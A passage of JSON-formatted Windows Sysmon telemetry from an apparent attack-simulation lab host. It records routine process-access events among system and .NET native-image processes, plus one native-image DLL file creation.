C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.184","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133F-5F25-0000-001051590D00}","TargetProcessId":"484","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7970,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.216\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010C7FA0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.216","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010C7FA0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7971,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.216\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010C7FA0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.216","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010C7FA0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7972,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010C7FA0C00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010C7FA0C00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7973,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.341\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133F-5F25-0000-001028600D00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.341","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133F-5F25-0000-001028600D00}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7974,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.341\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133F-5F25-0000-001028600D00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.341","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133F-5F25-0000-001028600D00}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7975,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.341\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133F-5F25-0000-001028600D00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.341","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133F-5F25-0000-001028600D00}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7976,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:19.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:19.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7977,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:20.372\r\nProcessGuid: {E2A3D6B1-133F-5F25-0000-001028600D00}\r\nProcessId: 4660\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1234-0\\PresentationBuildTasks.dll\r\nCreationUtcTime: 2020-08-01 07:01:20.372","Category":"File created (rule: 